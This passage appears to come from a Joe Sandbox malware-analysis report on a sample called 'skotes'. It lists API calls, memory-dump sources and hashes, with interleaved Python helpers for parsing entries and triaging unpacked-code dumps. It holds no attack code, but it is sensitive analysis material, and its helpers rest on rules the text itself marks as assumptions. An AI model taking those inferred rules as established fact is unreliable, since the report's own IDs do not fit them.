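        else:
            entry["fields"][key] = val
    return entry


def camel_tokens(api_name):
    """GetNativeSystemInfo -> ['Get', 'Native', 'System', 'Info']"""
    return re.findall(r"[A-Z][a-z0-9]*", api_name)


def expected_api_id(api_names):
    """Assumed rule: sorted CamelCase tokens of all called APIs, minus the 'Get' prefix."""
    tokens = [t for n in api_names for t in camel_tokens(n) if t != "Get"]
    return "".join(sorted(tokens))


def api_id_consistent(entry):
    """Sanity check: does the entry's API ID match the rule applied to its APIs list?"""
    return expected_api_id(a["name"] for a in entry["apis"]) == entry["fields"].get("API ID")


if __name__ == "__main__":
    e = parse_entry(SAMPLE_ENTRY)
    print(e["apis"], e["source"], api_id_consistent(e))
```

The `api_id_consistent` check is the one worth keeping around: when a report's API ID and its APIs list disagree under this rule, the rule (not the report) is what was inferred wrongly, and the assumed token handling should be revisited before relying on API IDs to cluster functions across samples.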
APIs
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,006C705B,?,?,00000000,00000000), ref: 006C7166
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Time$LocalSpecificSystem
• String ID:
• API String ID: 2574697306-0
• Opcode ID: c90e73f19c3519a311998d545fef8aa768e43128d1ba07ef307e1fa912b75cde
• Instruction ID: 23e946814ce524ec99de383ab29a8982460ba3b8cbcf72b438f1ecdac47f556b
• Opcode Fuzzy Hash: c90e73f19c3519a311998d545fef8aa768e43128d1ba07ef307e1fa912b75cde
• Instruction Fuzzy Hash: DD11EC7290410DABDB10DE95C985EEFB7FDEF08320F58526AE511E2180EB30EA49CB61
APIs
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: b9855a0438ecec278b2174369d6a748c8af28240eab1633a78f68eaa081cbf0f
• Instruction ID: 8afe91d27f83b10c6e0e2e9d1a890e19ffff6a09969ef0034d609ee240c14b6c
• Opcode Fuzzy Hash: b9855a0438ecec278b2174369d6a748c8af28240eab1633a78f68eaa081cbf0f
• Instruction Fuzzy Hash: B1111571A0420AAFCB05DF98E945E9A7BF5EF48304F054069F809AB351D770EE21CB69
APIs
• RtlAllocateHeap.NTDLL(00000000,440B685B,?,?,006AD3FC,440B685B,?,006A7A8B,?,?,?,?,?,?,00697465,?), ref: 006CB07D
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: e095501f5d170f3e9d15f48ecf4ed161bc2403b1ec51525dcb97efe8bfdc4a0b
• Instruction ID: cf4dbda9ab35f388485844aed4caf2430aa71bce2047c3f2818f3b8e51cf4c9f
• Opcode Fuzzy Hash: e095501f5d170f3e9d15f48ecf4ed161bc2403b1ec51525dcb97efe8bfdc4a0b
• Instruction Fuzzy Hash: 00E06D35345A259AEB3132659C02FBBA64BDF413B0F25322DED64A72A0DB51DD0081E5
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,006D1B65,?,?,00000000,?,006D1B65,00000000,0000000C), ref: 006D1792
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: 6e5767dd3ab515d3fb7588b1e64a2751da81405e818a63400786ab0e35ee43b1
                                                                                                                                                                                                                                          • Instruction ID: c562a62aa24c1adbd7ba4f0cc0e6ba1e62c4f11252429a48face9ac9cc7fd93b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e5767dd3ab515d3fb7588b1e64a2751da81405e818a63400786ab0e35ee43b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5D0923614010DBBDF129E84DC06EDA3FAAFB8C714F014100FE1C66020C772E931AB95
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 355ff06d74addbe4490ce075f7a78d54b4b0adcbda76c410e4a2f016d7f794b4
                                                                                                                                                                                                                                          • Instruction ID: a4aa7c7f95d34f5a31ec8a0be113a099169fe38edadfa54acf1b4b01f162a900
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 355ff06d74addbe4490ce075f7a78d54b4b0adcbda76c410e4a2f016d7f794b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321AE9F18C2107EE16BC6955A4CAF56B6BBADB3303324067F04386942E3D84B1A5131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 452b01500d5de66bf388f16654b5c906804bbbbbb0ee40b4211510f64425ab04
                                                                                                                                                                                                                                          • Instruction ID: bed97891808db4d4821e92ce0ea92ea1752365c6f53a4bbae18da9bf096906e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 452b01500d5de66bf388f16654b5c906804bbbbbb0ee40b4211510f64425ab04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB21A1AF18D210BEA16BD18A2B5CAF66B6FB9DB7303718027F007D5642E3C84A5D5131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e2e79f731ff044a1b95457a16fb558ea7e66979023baf169d7cf52699a683c42
                                                                                                                                                                                                                                          • Instruction ID: 568e62b25d6bc0266766937d95cead210595e2c71563b3ec1d669451f2d68702
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2e79f731ff044a1b95457a16fb558ea7e66979023baf169d7cf52699a683c42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D116DEF18C210BEA16BD58A2B4CAF66A6FF5DB3703718026F403D5642E3D84E5D6131
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
• API String ID:
• Opcode ID: 6bcb7bdc2fd9e93fb11109e9debb3abbb6a87e3dc3da7ecd23fcd57bbb3b0a73
• Instruction ID: 86b5ee9bbdf24f5fa16a6ba66d82279712c0bd62e2d082cbd784c013cad33987
• Opcode Fuzzy Hash: 6bcb7bdc2fd9e93fb11109e9debb3abbb6a87e3dc3da7ecd23fcd57bbb3b0a73
• Instruction Fuzzy Hash: B7119DEF188110BEA16BC18A6B58AF66A6FFADB3303318026F407D5642A3D84E5D5031
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7c8eb0d7beb18b319ec23c27aa6476af3802107d5a9e24248c0bdae8d247eaee
• Instruction ID: 4f9a4774bca375c0bca48fc1a1b801e27a226c447bacc3f4cf58cd400bcbe113
• Opcode Fuzzy Hash: 7c8eb0d7beb18b319ec23c27aa6476af3802107d5a9e24248c0bdae8d247eaee
• Instruction Fuzzy Hash: 0211CDEF18D2107EE267C5862B4CAB66B2FFADB3303318066F442D4542E3D84A5D5131
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba72039fcdaf75924b65634944527952c44b84db850ace528b4c38b52f17a786
• Instruction ID: d0ee80849b98b2e9cd2d77ff9aee0871a6b793148e7abd43be299ca9a419d5bc
• Opcode Fuzzy Hash: ba72039fcdaf75924b65634944527952c44b84db850ace528b4c38b52f17a786
• Instruction Fuzzy Hash: E51170EF188110BEA1ABD58A6B4CAF56A6FB9DB3303318026F043D5902E3D85E5D5031
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c3c80213689691a6c9fe38b91d8896ecd09b4a2240ccf0a0f7258fc641a4d7f6
• Instruction ID: cc66f9187df7e0dcb9ef42d703b6e6d3c3f877dfc7dcbb3d68327fb3385b0b2d
• Opcode Fuzzy Hash: c3c80213689691a6c9fe38b91d8896ecd09b4a2240ccf0a0f7258fc641a4d7f6
• Instruction Fuzzy Hash: ED0144DF1881107EA16BD18A1B4CEF5AA6FB9DB3303714166F043D1542E3D84F5D6031
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03b391406aee22687d9aeca38b762777dd17c8bdc7ea1fb1d544985612a8361a
• Instruction ID: 4b8383fd690f6e2ff092cdda441258caae390afb57f5a7e4bcc19d78827bc775
• Opcode Fuzzy Hash: 03b391406aee22687d9aeca38b762777dd17c8bdc7ea1fb1d544985612a8361a
• Instruction Fuzzy Hash: 0DF081EF18C2107EA157D18A2B4CAF6AA6FB9D73703708476F482D1503E2C84B0D6131
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fb28cf0b78fdf272b1c7301786ac8ac581febcc2aaf70e3ed1d54fc3e75f1aed
• Instruction ID: 0cbd1802a92be37d969acd76fe7563949288b0600a2a4f755f02c79a498dbf4b
• Opcode Fuzzy Hash: fb28cf0b78fdf272b1c7301786ac8ac581febcc2aaf70e3ed1d54fc3e75f1aed
• Instruction Fuzzy Hash: B9F08CEF1881106EA167D18A2B4CAB6AA6FB9DB3303718476F042D1502E3C88B4E6031
Memory Dump Source
• Source File: 00000003.00000002.7290992998.00000000051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_51a0000_skotes.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7e68fc19c9b2a2b2a8e4e6ce7492a46f75c39b686cd0647d2d34d5810f78efba
• Instruction ID: d9b6c55e43758762e49c842f1fb02cdf273bc2168ccd8f020ac3aade49f90e8a
• Opcode Fuzzy Hash: 7e68fc19c9b2a2b2a8e4e6ce7492a46f75c39b686cd0647d2d34d5810f78efba
• Instruction Fuzzy Hash: B9F01CAF1886106EA156D1862B1CAF5AAAFF5D73303B1853AF482D1502E2D84F5D6131
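The functions above all come from a dump at 051A0000 that the sandbox marks "based on PE: false", while the next block's source is image-backed. The following triage script is an added example (not Joe Sandbox's code) that parses these "Source File" descriptors and flags dumps that combine executable+writable protection, a private (non-image) region and no PE header: the usual signature of an unpacked stage. The field layout of the .sdmp name (pid.stage.id.base.protect.field6.type.field8) is an assumption inferred from the listings on this page and the winnt.h constants; only the protect and type fields are decoded, and the two sample lines are copied from this page.

```python
"""Triage Joe Sandbox memory-dump descriptors for unpacked-code candidates.

Added example, not Joe Sandbox's own code. ASSUMPTION: the .sdmp file name is
laid out as pid.stage.id.base.protect.field6.type.field8.sdmp, with `protect`
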